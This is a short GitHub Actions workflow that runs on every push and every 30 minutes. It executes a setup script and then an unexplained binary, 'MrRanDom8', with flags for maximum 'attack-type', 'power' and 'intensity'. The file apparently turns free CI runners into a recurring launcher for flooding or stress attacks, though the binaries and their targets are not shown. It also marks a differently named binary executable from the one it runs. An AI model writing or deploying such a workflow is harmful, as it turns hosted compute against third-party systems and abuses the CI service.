name: Run MyBot Workflow

on:
  push:
    branches:
      - main
  schedule:
    - cron: '*/30 * * * *' 

concurrency:   
  group: mybot-workflow-group
  cancel-in-progress: true

jobs:
  run_mybot_workflow:
    runs-on: ubuntu-latest

    steps:
      - name: Check out the code
        uses: actions/checkout@v3

      - name: Set permissions for balveer.sh and ranbal binary
        run: |
          chmod +x balveer.sh ranbal  

      - name: Run balveer.sh for dependencies (one-time setup)
        run: |
          ./balveer.sh
          
      - name: Check DNS Server
        run: cat /etc/resolv.conf
        
      - name: execution of MrRanDom8
        run: |
          ./MrRanDom8 --attack-type max --power core_max --intensity highest
